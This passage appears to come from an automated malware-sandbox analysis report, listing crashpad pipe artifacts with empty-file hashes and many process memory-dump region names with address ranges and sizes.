                                      1ed20fad96ae459e82592792038bffdfd4dc009eab84ab8af33ea2f9faed976aacd4937a8b0fec8095b05b02839c96277dccb6c3ca525ce226822d84670e279e

                                    • \??\pipe\crashpad_2040_RHCFLEJHGIPYZDFT
                                      MD5

                                      d41d8cd98f00b204e9800998ecf8427e

                                      SHA1

                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                      SHA256

                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                      SHA512

                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                    • \??\pipe\crashpad_4284_RXPFUURNAJCMRHSJ
                                      MD5

                                      d41d8cd98f00b204e9800998ecf8427e

                                      SHA1

                                      da39a3ee5e6b4b0d3255bfef95601890afd80709

                                      SHA256

                                      e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                      SHA512

                                      cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                    • memory/508-383-0x0000000000000000-mapping.dmp
                                    • memory/688-398-0x0000000000000000-mapping.dmp
                                    • memory/1312-151-0x0000000005150000-0x0000000005151000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1312-148-0x0000000004F10000-0x0000000004F11000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1312-209-0x0000000004F30000-0x0000000004F3B000-memory.dmp
                                      Filesize

                                      44KB

                                    • memory/1312-150-0x0000000004E40000-0x0000000004E41000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1312-135-0x0000000000510000-0x0000000000511000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1312-118-0x0000000000000000-mapping.dmp
                                    • memory/1312-137-0x0000000005370000-0x0000000005371000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1312-140-0x0000000004F50000-0x0000000004F51000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1544-172-0x0000000000000000-mapping.dmp
                                    • memory/1544-191-0x0000000005360000-0x0000000005361000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/1564-116-0x0000000000000000-mapping.dmp
                                    • memory/1564-128-0x00000000008F0000-0x00000000008F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/2040-321-0x0000000000000000-mapping.dmp
                                    • memory/2196-337-0x0000000000000000-mapping.dmp
                                    • memory/2204-332-0x0000000000000000-mapping.dmp
                                    • memory/2204-454-0x0000000000000000-mapping.dmp
                                    • memory/2244-331-0x0000000000000000-mapping.dmp
                                    • memory/3180-138-0x0000000000E00000-0x0000000000E3E000-memory.dmp
                                      Filesize

                                      248KB

                                    • memory/3180-145-0x000000001C130000-0x000000001C132000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3180-149-0x000000001BF30000-0x000000001BF31000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3180-142-0x0000000000E40000-0x0000000000E6E000-memory.dmp
                                      Filesize

                                      184KB

                                    • memory/3180-211-0x000000001FCD0000-0x000000001FCD1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3180-114-0x0000000000000000-mapping.dmp
                                    • memory/3180-129-0x00000000004D0000-0x00000000004D1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3180-212-0x00000000203D0000-0x00000000203D1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3180-143-0x0000000000E70000-0x0000000000E89000-memory.dmp
                                      Filesize

                                      100KB

                                    • memory/3180-214-0x000000001C0F0000-0x000000001C0F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3180-146-0x00000000013F0000-0x00000000013F1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3600-132-0x0000000000D70000-0x0000000000D71000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3600-147-0x000000001B7E0000-0x000000001B7E2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3600-119-0x0000000000000000-mapping.dmp
                                    • memory/3600-139-0x0000000002D50000-0x0000000002D65000-memory.dmp
                                      Filesize

                                      84KB

                                    • memory/3616-156-0x0000000000000000-mapping.dmp
                                    • memory/3616-164-0x0000000004F30000-0x0000000004F37000-memory.dmp
                                      Filesize

                                      28KB

                                    • memory/3616-160-0x00000000008E0000-0x00000000008E1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-189-0x00000000050B3000-0x00000000050B4000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-186-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-168-0x0000000000CA0000-0x0000000000CBD000-memory.dmp
                                      Filesize

                                      116KB

                                    • memory/3772-170-0x00000000028F0000-0x000000000290B000-memory.dmp
                                      Filesize

                                      108KB

                                    • memory/3772-171-0x00000000055C0000-0x00000000055C1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-175-0x0000000002AC0000-0x0000000002AC1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-192-0x0000000005C40000-0x0000000005C41000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-177-0x0000000002AE0000-0x0000000002AE1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-190-0x00000000050B4000-0x00000000050B6000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3772-188-0x00000000050B2000-0x00000000050B3000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-182-0x0000000004F90000-0x0000000004F91000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3772-185-0x0000000000400000-0x0000000000915000-memory.dmp
                                      Filesize

                                      5.1MB

                                    • memory/3772-117-0x0000000000000000-mapping.dmp
                                    • memory/3772-184-0x00000000001C0000-0x00000000001F1000-memory.dmp
                                      Filesize

                                      196KB

                                    • memory/3900-187-0x000000001AED0000-0x000000001AED2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/3900-166-0x00000000025A0000-0x00000000025A1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3900-163-0x000000001AEE0000-0x000000001AF11000-memory.dmp
                                      Filesize

                                      196KB

                                    • memory/3900-161-0x0000000002590000-0x0000000002591000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/3900-152-0x0000000000000000-mapping.dmp
                                    • memory/3900-155-0x00000000005B0000-0x00000000005B1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4004-141-0x0000000000000000-mapping.dmp
                                    • memory/4084-440-0x0000000000000000-mapping.dmp
                                    • memory/4140-225-0x0000020491DF0000-0x0000020491DFE000-memory.dmp
                                      Filesize

                                      56KB

                                    • memory/4140-205-0x0000020491DC3000-0x0000020491DC5000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/4140-193-0x0000000000000000-mapping.dmp
                                    • memory/4140-199-0x0000020491D60000-0x0000020491D61000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4140-210-0x0000020491DC6000-0x0000020491DC8000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/4140-202-0x00000204AAC80000-0x00000204AAC81000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4140-203-0x0000020491DC0000-0x0000020491DC2000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/4180-362-0x0000000000000000-mapping.dmp
                                    • memory/4196-445-0x0000000000000000-mapping.dmp
                                    • memory/4284-433-0x0000000000000000-mapping.dmp
                                    • memory/4288-355-0x0000000000000000-mapping.dmp
                                    • memory/4384-325-0x0000000000000000-mapping.dmp
                                    • memory/4588-338-0x0000000000000000-mapping.dmp
                                    • memory/4612-343-0x0000000000000000-mapping.dmp
                                    • memory/4620-348-0x0000000000000000-mapping.dmp
                                    • memory/4640-240-0x0000000005080000-0x0000000005686000-memory.dmp
                                      Filesize

                                      6.0MB

                                    • memory/4640-228-0x0000000000400000-0x000000000041E000-memory.dmp
                                      Filesize

                                      120KB

                                    • memory/4640-229-0x0000000000418E5A-mapping.dmp
                                    • memory/4640-241-0x0000000006370000-0x0000000006371000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4640-242-0x0000000006A70000-0x0000000006A71000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4640-243-0x00000000065B0000-0x00000000065B1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4640-244-0x00000000067A0000-0x00000000067A1000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4736-368-0x0000000000000000-mapping.dmp
                                    • memory/4808-375-0x0000000000000000-mapping.dmp
                                    • memory/4856-252-0x000000000040CD2F-mapping.dmp
                                    • memory/4856-260-0x0000000005294000-0x0000000005296000-memory.dmp
                                      Filesize

                                      8KB

                                    • memory/4856-259-0x0000000005290000-0x0000000005291000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4856-262-0x0000000005292000-0x0000000005293000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4856-258-0x0000000000400000-0x0000000000491000-memory.dmp
                                      Filesize

                                      580KB

                                    • memory/4856-263-0x0000000005293000-0x0000000005294000-memory.dmp
                                      Filesize

                                      4KB

                                    • memory/4920-389-0x0000000000000000-mapping.dmp
                                    • memory/4964-264-0x0000000000000000-mapping.dmp
                                    • memory/4984-265-0x0000000000000000-mapping.dmp
                                    • memory/5016-391-0x0000000000000000-mapping.dmp